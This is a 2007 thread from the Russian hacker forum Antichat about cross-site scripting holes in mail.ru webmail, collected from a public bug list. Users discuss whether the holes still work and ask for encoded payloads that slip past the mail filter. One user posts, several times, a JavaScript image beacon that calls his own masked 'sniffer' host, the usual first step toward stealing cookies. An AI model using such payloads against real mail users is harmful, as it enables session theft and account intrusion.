Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS на mail.ru (https://forum.antichat.xyz/showthread.php?t=32183)

je0n 27.01.2007 17:00
XSS на mail.ru
 
Короче, это нашел не я. Уязвимости лежат в паблике уже долгое время. Обнаружил не я, а типуля, судя по сайту ему 16 лет. Короче респект и уважуха таким )) Надеюсь, если он выложил их в паблик, то ему их не жалко (засекаем время):
http://usatikov.com/bugs.php

OMOH_PA 27.01.2007 23:20
Чет не работает нифига. Походу уже поправили давно..

_Great_ 27.01.2007 23:22
Не надо, прекрасно работает

DeBugger 27.01.2007 23:24
Цитата:
Сообщение от omoh_pa
Чет не работает нифига. Походу уже поправили давно..
Ещё бы. Он ведь пишет, что сначала "стучит" админам, а потом публикует.

Luccifer 27.01.2007 23:59
xss.netsec.ru чет отвалил...кто нить знает альтернативу...?=)

Sn@k3 28.01.2007 00:18
не вижу пользы в алертах, имхо, врятли кто будет ходить в кодированных сылках... лучше соц....

Luccifer 28.01.2007 00:27
Цитата:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный Html-код,
заблокированный автоматической системой безопасности.
Нлять пацаны дайте кто нить в закодированном виде...я сам это делаю с трудом ...докуя времени уйдет. А так бага вполне рабочая думаю.

je0n 28.01.2007 01:05
уже 8 часов прошло со времени создания поста, еще не закрыли )) Хотя выходные же ). Наверное еще и завтра работать будут )

Ci5 28.01.2007 10:32
Наверное нашел ту же самую багу, оповестил техподдержку и теперь бага, которая была найдена еще до него будет закрыта. :(

Makes 28.01.2007 20:41
Создал сниффер на php хосте.
Набираю в строке браузера http://****/data.php?1.
В логах приходит "1". Все нормально.

Создаю html страничку к кодом:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>

Загружаю ее в своем браузере. Ничего на сниффер не приходит. Почему?

itiran 29.01.2007 22:47
а конкретно кто то может создать видео для ламеров КАК ВСЁ ВЫШЕ НАПИСАНОЕ ИСПОЛЬЗОВАТЬ НА ПРАКТИКЕ

а то извините тут все такие программисты и гуру, что ваши слова как "матюки" не опытному пользователю - не понятно :confused:

Constantine 29.01.2007 22:55
2itiran
Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html
Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере.

Без базового знание, и видео тебе вряд ли будет интересно и полезно

Makes 29.01.2007 23:55
Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>

Майор 30.01.2007 00:31
Цитата:
Сообщение от Makes
Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>
в IE точно выполняется

Aerot1smo 30.01.2007 00:47
а можно ссылочку на эту "статью Zadoxlik'a" ?

ZaCo 30.01.2007 01:12
Ohhh usatikov very very old true hэcker.

Constantine 30.01.2007 18:06
Цитата:
Сообщение от Aerot1smo
а можно ссылочку на эту "статью Zadoxlik'a" ?
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa&year=2006

Восьмой номер. Сливай PDF арихив и читай

INKOGNITO-SHADOW 02.02.2007 16:09
Цитата:
Сообщение от Constantine
2itiran
Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html
Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере.

Без базового знание, и видео тебе вряд ли будет интересно и полезно
OTLICHNO!!!!!!!!!!!!


Время: 00:51